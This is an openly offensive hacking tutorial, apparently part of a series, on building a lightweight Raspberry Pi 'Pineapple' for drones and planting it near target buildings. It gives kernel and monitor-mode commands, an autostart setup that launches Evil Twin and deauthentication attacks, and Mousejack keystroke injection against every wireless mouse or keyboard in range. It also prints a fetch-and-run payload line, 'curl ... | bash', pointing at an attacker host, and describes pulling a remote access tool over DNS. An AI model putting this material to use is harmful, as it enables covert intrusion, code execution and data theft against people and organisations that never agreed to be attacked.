Login
Drone Hacking: Build Your Own Hacking Drone, Part 3
Welcome back, aspiring drone cyberwarriors!
We continue our series of articles on Drone Hacking. In previous parts, we discussed drones as platforms and delivery mechanisms. Now it is time to take a closer look at the attacking component itself. This is where many people misunderstand the threat. For a hacker, a drone is not a weapon. A drone is merely transportation. It is the deliverer, not the attacker. In reality, almost all wireless attacks are carried out using a small, miniature device attached to the drone. This device performs the scanning, interception, impersonation, and exploitation of wireless protocols. One such device is a Pineapple built on a Raspberry Pi, which we will show today how to build. Its compact size allows it to be mounted on almost any drone, because it is lightweight and consumes little power. In fact, this same device does not even require a drone at all. It can be used independently. A hacker can quietly plant such a device near a target building, drop it into grass or bushes near an office, or hide it in everyday infrastructure. OTW has already explained how it was done in Mr.Robot
Many readers will remember the scene from the TV series where a Raspberry Pi is hidden inside a thermostat. That scene is not science fiction. It is a very realistic example of how such hardware can be deployed. In a separate article we will show you how our device operates when used independently without a drone.
Raspberry Pi Pineapple
Now, let’s talk about our new device. The total weight of the homemade Pineapple together with its battery ranges from only 17 to 43 grams, depending on the battery used. Modern consumer drones are designed with power reserves to compensate for wind and to carry accessories such as action cameras. As a result, they can typically lift between one-third and one-half of their own weight without a noticeable loss of flight performance.
This means that almost any drone, including very small selfie drones, can easily handle such a payload. This is a significant advantage compared to the bulky, ready-made Pineapple device from Hak5. Not every drone can lift that commercial unit. From an attacker’s perspective, speed is often the most important requirement when planning drone-based attacks. Fast deployment, short exposure time, and rapid exit are key.
In a separate article dedicated specifically to the Pineapple platform, we will examine static attacks on wireless networks. These are attacks where long-term presence at a fixed point is required. When a drone is involved, however, it makes far more sense to perform dynamic attacks. Wireless attacks are highly dependent on circumstances, such as whether client devices are present and active at a given moment. Because of this, the duration of exposure directly affects the probability of success. From a practical standpoint, the choice is obvious. If the device is lost, the hacker simply purchases another Raspberry Pi and flashes a prepared image onto a memory card. There is no need to buy a costly ready-made solution and wait for delivery.
The Raspberry Pi, like most other single-board computers, can operate at reduced voltage, which makes it possible to use popular compact 3.7 V batteries. Such batteries are cheaper and smaller than power banks and can be easily purchased online. They are charged with 5 V, which can be taken from any USB port. However, despite the fact that the Raspberry Pi can operate at 3.3 V, external USB devices do not receive the 5 V promised by the USB standard in this case. Therefore, if such external USB devices are planned to be used, the voltage must still be raised to 5 V using the popular DC-DC MT3608 module (the blue module on top).
A 3.7 V battery, located at the bottom, supplies 5 V to GPIO pins 2 and 9 through the MT3608 DC-DC boost converter. An external Micro-USB connector is also soldered to the converter for convenient battery charging, along with a power toggle switch for battery supply. Nevertheless, the Raspberry Pi has two native USB ports, which means there is always the option to use a regular power bank. The wiring diagram for LEDs, switches, and power connections is shown below.
Using a display can be wasteful in terms of battery consumption, so it is better to use three LEDs to indicate the process. To automatically start predefined scenarios, six jumper positions are used. Their software handling is described below. Two voltage supply points are also provided: 5 volts and 3.3 volts. Pins 8 and 10 serve an additional purpose. Using a UART adapter, an operator can always open a shell on the Pineapple device for debugging or control.
Now we arrive at one of the most important components. It’s the Wi-Fi adapter. Monitor mode is not available out of the box on the Raspberry Pi’s built-in Wi-Fi card. It can be enabled using special firmware, but this requires building and installing a new kernel.
Pi > wget -O re4son-kernel_current.tar.xz https://re4son-kernel.com/download/re4son-kernel-current/
Pi > tar -xJf re4son-kernel_current.tar.xz
Pi > cd re4son-kernel_4*
Pi > sudo ./install.shAfter installation, an additional firmware file for the Wi-Fi chip appears. This file enables monitor mode functionality.
Pi > md5sum /lib/firmware/brcm/brcmfmac43430-sdio.*
bae7f1ba1b64cb19bb0c5433a3940405 /lib/firmware/brcm/brcmfmac43430-sdio.bin.monitor
54f6af2776997cb1ee06edf2b93ab815 /lib/firmware/brcm/brcmfmac43430-sdio.bin.originalTo switch between firmware versions, the driver can be reloaded and the firmware file renamed.
Pi > iw phy0 interface add mon0 type monitor
Pi > ifconfig mon0 up
Pi > airodump-ng mon0At this point, the device can autonomously perform many of the most common Wi-Fi attacks. If necessary, external Wi-Fi adapters and directional antennas can be used, although this reduces stealth and increases detectability.
Because this configuration may shut down improperly when the battery is depleted, it is recommended to disable disk caching to prevent data loss.
/etc/fstab
PARTUUID=067e19d7-02 / ext4 defaults,noatime,sync 0 1In some scenarios, the hacker needs attacks to start immediately upon power-up. This is achieved using GPIO jumpers. Jumper positions are read in software using the following script.
/etc/local/bin/jmp
#!/bin/bash
exit $(raspi-gpio get $1 | awk '{print $3}' | cut -d '=' -f )By setting a jumper position before powering on the device, the hacker selects which attack scenario to launch, such as an Evil Twin or mass deauthentication and handshake capture. The logic for this selection is implemented in the startup script.
A startup.sh file is created in /home/pi
You can find this script on our GitHub
Then you need to add the following entry to /etc/rc.local:
/bin/bash /home/pi/startup.sh &This will launch the script automatically. Attack progress and results are stored on the device’s memory card. Filenames reflect the attack type, date, and time. With the platform established, we now move on to the first most critical attacks that can be carried out using a drone.
Mousejack
There is a widespread vulnerability that has persisted for decades in hundreds of thousands of wireless mice and keyboards. It gives you a remote code execution in one to two seconds. Quite a cinematic scene. This vulnerability is known as Mousejack. An attack on wireless HID devices is perhaps the most visually striking and dangerous attack possible. With minimal effort and no user interaction, a hacker can remotely send arbitrary keystrokes. This means arbitrary code execution. No password guessing. No social engineering. Instant RCE. Below is the part of our startup.sh code that starts this attack.
The attack is performed using a CrazyRadio PA device in combination with a single-board computer such as a Raspberry Pi or a Pineapple. If the CrazyRadio PA dongle is inserted into the Pineapple, the attack can be launched automatically at startup, once you add mousejack.sh to the mousejack directory. We have it here. You will also need to install jackit, which you can find here
Because we don’t know the addresses of target devices, we attack everything detected in the radio spectrum. This is why the –autopwn flag is used. Combined with a Pineapple, CrazyRadio becomes an extremely dangerous tool.
A drone carrying such a device can breach the perimeter of almost any organization. While flying, it attacks all vulnerable devices within range. Mousejack exploitation is similar to BadUSB-HID attacks. Here we encounter the same problems when typing commands: when using keystrokes, we have to guess the keyboard layout. Also, when using ALT codes to type commands (possible only on Windows), we have to guess the state of the Num Lock key. In both cases, to be reliable, we have to send the keystrokes twice, changing either the layout or the Num Lock state. But in the case of ALT codes, three to four times more keystrokes are required. And if there is no difference in outcome, why transmit more? It is more rational here to use the simple method of sending direct key presses rather than their codes. That’s why ducky.txt is used
Find it and place it in /home/pi/mousejack/. Depending on your language preferences, you might need to modify the file.
Longer commands increase the chance of interference. A single dropped keystroke can break the exploit. On Unix-like systems, hackers often rely on short commands such as:
curl -L http://rce.attacker.tk/1.sh | bash
At this stage, success depends only on drone positioning and the presence of wireless mice within a radius of approximately 10-15 meters. This attack looks exactly like it does in movies. Imagine working in a secure building, far from checkpoints, when a drone briefly appears outside a window. In a single second, malicious code is executed on your computer. You may never associate that moment with the compromise.
Wireless mice and keyboards are especially common among IT staff and executives, making such attacks disproportionately valuable. Once a single internal machine is compromised, the perimeter is breached.
Even when direct internet access is blocked, DNS-based exfiltration often remains possible. DNS can be used to download payloads and maintain command-and-control channels. Implementing the download of a malicious program over DNS can be done using basic tools of any operating system. For example, on Windows, the most portable method is a VBS script written in a full-fledged interpreted programming language. However, the length of the command entered into the “Run” window is limited, and to type a VBS script that downloads a remote administration tool over DNS, the hacker will need at least three commands. For this you will need a file that you can find here
When these commands are executed, three DNS callbacks should arrive at the hacker’s server, indicating that the commands were entered successfully.
Summary
This is only our first example that demonstrates how easily organizations can be compromised if you find the right computer. If you plan to use it, do it responsibly. Despite being known since 2016, Mousejack remains widespread and underestimated. Because it is a hardware flaw, it persists for years. People replace phones frequently, but they rarely replace their mice.
In Part 4 you will see more of these attacks and the needed scripts for them.
For those of you getting started with Software-Defined Radio (SDR) or looking to advance your SDR hacking skills, we offer a structured training program that guides you from the fundamentals of SDR all the way to advanced, real-world applications in cybersecurity and signals intelligence.
